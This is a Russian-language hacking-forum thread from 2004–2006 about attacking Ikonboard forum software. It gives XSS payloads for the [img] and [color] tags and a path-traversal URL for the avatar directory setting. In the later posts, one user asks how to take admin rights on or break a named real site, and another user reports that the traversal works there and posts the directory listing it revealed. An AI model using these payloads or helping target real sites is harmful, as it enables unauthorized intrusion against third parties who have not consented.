ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Какие Уязвимости есть в Iconboard?
  #1  
Старый 19.08.2004, 10:59
Аватар для Fr1k
Fr1k
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191

Репутация: 13
Отправить сообщение для Fr1k с помощью ICQ
По умолчанию Какие Уязвимости есть в Iconboard?

Какие Уязвимости есть в Iconboard???
Знаю про баг который позволяет пользователям обратится к ограниченным ресурсам но эта дыра заклеена... существую ли ещё какие нить баги?
 
Ответить с цитированием

  #2  
Старый 22.08.2004, 23:15
Аватар для
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Парень тебе здесь никто не скажет т.к этот форум на таком движке стоит
 
Ответить с цитированием

  #3  
Старый 22.08.2004, 23:34
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию

Есть xss в теге [img] ...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[IMG]javascript:alert('antichat.ru')[/IMG]
[/QUOTE]<span id='postcolor'>
И в теге [color]
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[color=red;background-image:url('javascript:alert('LOL')')]antichat[/color]
[/QUOTE]<span id='postcolor'>
 
Ответить с цитированием

  #4  
Старый 28.08.2004, 10:17
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

ne zaplatalai diru chto li? &nbsp;
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #5  
Старый 28.08.2004, 13:50
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

В нашем форуме это пофиксено
 
Ответить с цитированием

  #6  
Старый 14.11.2006, 22:19
Аватар для RAMOS
RAMOS
Новичок
Регистрация: 05.11.2006
Сообщений: 11
Провел на форуме:
80296

Репутация: -11
По умолчанию

че можна зделать с board.zeos.net Можно получить права админа или просто сламать
 
Ответить с цитированием

  #7  
Старый 14.11.2006, 22:26
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию

Цитата:
Сообщение от RAMOS  
че можна зделать с board.zeos.net Можно получить права админа или просто сламать
Знаю я его
Там действует одна из уязвимостей,которая описана в обзоре данного движка .
http://forum.antichat.ru/thread26024.html

P/s:Задрало говорить юзай поиск !

Последний раз редактировалось _-[A.M.D]HiM@S-_; 14.11.2006 в 22:28..
 
Ответить с цитированием

  #8  
Старый 14.11.2006, 22:40
Аватар для RAMOS
RAMOS
Новичок
Регистрация: 05.11.2006
Сообщений: 11
Провел на форуме:
80296

Репутация: -11
Exclamation

Цитата:
cgi-bin/forum/ikonboard.cgi?act=UserCP;CODE=01;MODE=1;useravatar _dir=../../../
ета уязвимость там не работает , там нет никаких ID , там есть чтото наподобие MID=90-1162285788 и ссылка там не site/cgi-bin/forum/ikonboard.cgi? , а site/cgi-bin/ikonboard.cgi? ЕСТЬ на него какието еще уязвимости

Последний раз редактировалось RAMOS; 14.11.2006 в 22:44..
 
Ответить с цитированием

  #9  
Старый 14.11.2006, 22:48
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию

Цитата:
Сообщение от RAMOS  
ета уязвимость там не работает , там нет никаких ID , там есть чтото наподобие MID=90-1162285788 и ссылка там не site/cgi-bin/forum/ikonboard.cgi? , а site/cgi-bin/ikonboard.cgi? ЕСТЬ на него какието еще уязвимости
З.ы:У меня почимуто там все роботает


Код:
<option value='banner.zeos.net'>banner.zeos</option>
<option value='board.zeos.net'>board.zeos</option>
<option value='cgi-bin'></option>
<option value='club.pixelfab.com'>club.pixelfab</option>
<option value='htdocs'></option>
<option value='icons'></option>
<option value='new.zeos.net'>new.zeos</option>
<option value='old.zeos.net'>old.zeos</option>
<option value='test.zeos.net'>test.zeos</option>
<option value='us.zeos.net'>us.zeos</option>
<option value='www.incubus.net'>www.incubus</option>
<option value='www.pixelfab.com'>www.pixelfab</option>
<option value='www.polar.kiev.ua'>www.polar.kiev</option>
<option value='www.zeos.net'>www.zeos</option>

Последний раз редактировалось _-[A.M.D]HiM@S-_; 14.11.2006 в 22:51..
 
Ответить с цитированием

  #10  
Старый 14.11.2006, 22:53
Аватар для RAMOS
RAMOS
Новичок
Регистрация: 05.11.2006
Сообщений: 11
Провел на форуме:
80296

Репутация: -11
Question

как мне ето использовать , что писать после /cgi-bin/ikonboard.cgi?act=UserCP;CODE=01;MODE=1 , и что мне даст ета уязвимость

Последний раз редактировалось RAMOS; 14.11.2006 в 23:18..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие уязвимости есть в IPB v1.1.2? Inferno Форумы 2 26.06.2007 22:23
Какие есть уязвимости у чатов написанных на php? Va_RuS Чаты 30 07.03.2006 23:24
Какие есть уязвимости в Powered by phpBB: 2.0.0 © 2001 phpBB Group? forever777 Форумы 4 14.12.2005 13:19
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ